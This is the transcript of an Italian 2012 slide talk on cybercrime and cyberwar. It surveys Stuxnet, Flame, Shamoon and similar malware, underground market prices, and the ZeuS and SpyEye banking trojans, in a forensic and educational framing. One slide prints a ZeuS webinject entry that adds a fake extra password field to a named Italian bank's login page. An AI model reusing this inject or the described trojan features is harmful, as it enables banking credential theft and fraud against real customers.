Crimini Informatici 2012
-
Upload
gianni-amato -
Category
Documents
-
view
1.510 -
download
3
Transcript of Crimini Informatici 2012
Crimini Informatici 2012Indagini Digitali in ambito Giudiziario e Forense
Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.
Who is?
● Author: Gianni Amato● Site: www.securityside.it● Blog: www.gianniamato.it● Email: [email protected]● Twitter: @guelfoweb
IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.
Cosa è il Cybercrime
● Un crimine come tutti gli altri, con l'aggiunta della componente informatica
● La componente informatica può essere il mezzo o l'obiettivo del crimine (o entrambi)
Cominciamo dalla Cyberwar
L'apocalisseCosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche
✔ Prenotazioni online di treni e aerei bloccate✔ Sistemi di controllo di linee aeree e treni in tilt✔ Le comunicazioni email interrotte✔ Caos nelle Pubbliche Amministrazioni✔ Raffinerie e Oleodotti fuori controllo✔ Acqua, gas, rete elettrica fuori uso
Terrorismo?
● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.
Impossibile che accada?
● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto.
– 2010: Stuxnet
– 2011: Duqu
– 2011: Gauss
– 2012: Mahdi
– 2012: Flame
– 2012: Wiper
– 2012: Shamoon
Chi potrebbero essere gli artefici?
● Chiunque!– Dai servizi segreti ai gruppi di estremisti
– Dai militari ai terroristi
– Nazioni in contrasto da anni
2010: Stuxnet
● Scoperto nel giugno 2010● Obiettivo: Sabotare il programma nucleare
Iraniano– Sistemi SCADA
● Windows + WinCC + PCS 7
● Progetto USA “Operation Olympic Games” iniziato da George W. Bush
– Si diffonde via USB
– Sfrutta vulnerabilità 0-day
2010: Stuxnet
● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore
● Gli autori erano in possesso di certificati digitali: Realtek e JMicron
● Verisign revoca i certificati il 16 luglio● Il 17 luglio viene rilevata una nuova versione
di Stuxnet con i certificati rubati a Jmicron
2010: Stuxnet
● Il valore numerico '1979050' trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato
come la possibile data di nascita di uno degli autori: 09/05/1979
● E' stato appurato che la data rilevata all'interno del codice di Stuxnet '24/6/12' coincide esattamente con la data del suo decesso
2011: Duqu
● Scoperto nel settembre 2011● Condivide codice di Stuxnet (?)● Il target ancora una volta è l'Iran: valutare lo
stato del programma nucleare● Obiettivo diverso: furto di informazioni● Utilizza certificati rubati● Ha funzioni di keylogger● Sfrutta vulnerabilità 0-day (kernel Windows)
2011: Gauss
● Scoperto nel settembre 2011● Rilevato in Libano, Israele, Palestina, Stati
Uniti e Emirati Arabi● Obiettivo: furto di password e conti bancari● Si ipotizza sia stato creato dagli stessi autori
di Stuxnet e Duqu
2012: Mahdi
● Scoperto nel febbraio 2012● Il nome deriva da stringhe trovate nel codice
che fanno riferimento al Messia Islamico● Non si conoscono gli autori● Ha funzioni di keylogger e cattura schermate● Ruba file audio, file di testo e immagini● Sfrutta bug di Word e Power Point
2012: Flame
● Scoperto nell'aprile 2012● Individuato da Kaspersky Lab in Iran (Iranian
Oil Minestry● CrySyS Lab sostiene che il malware potrebbe
essere online dal 2007● Si propaga tramite USB Key, nella rete locale
grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa
● Usa un falso certificato digitale
2012: Flame
● Ha funzioni di keylogger● Cattura immagini● Registra l'audio (conversazioni via Skype)● Ruba documenti di testo e file DWG (Progetti
AutoCad)● Rilevate somiglianze con Stuxnet e Duqu ma
con un obiettivo diverso: spionaggio industriale
2012: Flame risale al 2008?http://www.crysys.hu/skywiper/skywiper.pdf
● $ python peframe.py --export mssecmgr.ocx
● [IMAGE_EXPORT_DIRECTORY]
● 0x5F694 0x0 Characteristics: 0x0
● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC]
● 0x5F69C 0x8 MajorVersion: 0x0
● 0x5F69E 0xA MinorVersion: 0x0
● 0x5F6A0 0xC Name: 0x13C4EE
● 0x5F6A4 0x10 Base: 0x1
● 0x5F6A8 0x14 NumberOfFunctions: 0x5
● 0x5F6AC 0x18 NumberOfNames: 0x5
● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC
● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0
● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4
2012: Wiper
● Un soldato inviato sul campo di battaglia per ripulire le tracce
● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu
● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet)
● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)
2012: Shamoon
● Scoperto nel mese di agosto 2012● Shamoon è il nome trovato nel codice● Progettato per lo spionaggio● Ha preso di mira un ente petrolifero di Stato
Saudita● Cancella i dati del pc infetto sostituendoli con
delle immagini (una bandiera americana)● I file originali vengono verso un server
sconosciuto
Perchè analizzare un Malware?
L'analisi è una procedura che va eseguita in laboratorio - quando è possibile - e consente di ricostruire la logica del malware per rispondere ai quattro quesiti che si presentano quando una macchina viene compromessa.
I 4 Quesiti
● 1. Qual è lo scopo del malware? ● 2. Quali informazioni è riuscito a carpire? ● 3. Dove sono state trasmesse le informazioni? ● 4. Come ha fatto ad arrivare fin qui?
Con cosa abbiamo a che fare?
● Persone altamente competenti● Codice è offuscato● Crittorgrafia (soprattutto durante la
trasmissione dei dati)● Funzioni di rootkit● Vulnerabilità 0-day
Tipi di Analisi
● Analisi Statica– Codice
– Signature
– Evidence
● Analisi Dinamica– Comportamento
– Mutazioni
– Connessioni
Remote Access Trojan
Malware Anti-Analysis
● Anti Online-Analysis– ThreatExpert– CWSandbox– Anubis
● Anti Virtualizzation– VMware– Virtualbox– Virtual PC
● Anti Debug/Disass.– Softice– OllyDbg– IDA Pro
Torniamo al Cybercrime
Vulnerabilità Condivise
Acquisti nell'Underground Russo
● Hacking a Gmail account: $162● Hacking a corporate mailbox: $500)● Scans of legitimate passports: $5 each● Winlocker ransomware: $10-20● Unintelligent exploit bundle: $25● Intelligent exploit bundle: $10-3,000● Traffic: $7-15 per 1,000 visitors for the most
valuable traffic (from the US and EU)
Acquisti nell'Underground Russo
● Basic crypter (for inserting rogue code into a benign file): $10-30
● SOCKS bot (to get around firewalls): $100● Hiring a DDoS attack: $30-70 for a day,
$1,200 for a month● Email spam: $10 per one million e-mails● Expensive email spam (using a customer
database): $50-500 per one million e-mails
Acquisti nell'Underground Russo
● SMS spam: $3-150 per 100-100,000 messages
● Bots for a botnet: $200 for 2,000 bots● DDoS botnet: $700● ZeuS source code: $200-$500● Windows rootkit (for installing malicious
drivers): $292● Hacking a Facebook or Twitter account: $130
ZeuSUn progetto criminale (ora) Open Source
ZeuS Info
● Online dal 2006● Scritto in Visual C++● Gli autori non amano chiamarlo Trojan,
Backdoor o Virus. Lo chiamano semplicemente “Bot”
● Prende di mira i sistemi MS Windows● Basato sulle intercettazioni delle WinAPI
ZeuS Ring
● Ring3– Garantisce adattabilità e scalabilità
– Può operare in Guest User
ZeuS Client Features
● Sniffer di traffico su protocollo TCP● Intercettazione di login FTP● Intercettazione di login POP3● Intercetta le chiamate alla libreria Wininet.dll
(usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS
● Encryption 1024-bit RSA
ZeuS Server Features
● Usa Socks 4/4a/5 con supporto UDP e IPv6● Connessioni alla macchina infetta via FTP o
RDP● Screenshot in real time● Esecuzione comandi da remoto
ZeuS HTTP-inject/HTTP-grabberwebinjects.txt
set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP
data_beforename="PASSWORD"*<tr>
data_enddata_inject
<td height="32" class="grigio10">password dispositiva <br/><input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub('PASSWORD', event);" tabindex="2" style="width: 110px;"/></td><td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td>
data_enddata_afterdata_end
ZeuS HTTP-inject/HTTP-grabberBefore - After
ZeuS Installation
✔Apache✔PHP✔MySql
ZeuS Control Panel
ZeuS Botnet
Arriva la Concorrenza
La prima versione di SpyEye con opzione Kill ZeusNato per accaparrarsi una fetta del mercato di ZeuS
SpyEye
● Presente dal 2009● Progettato dai Russi● Ha un costo di 500$ al mercato nero● Il business maggiore è basato sui plugin
SpyEye + ZeuS
● Brute force password guessing● Jabber notification● VNC module● Auto-spreading● Auto-update● Screenshot system
Domande?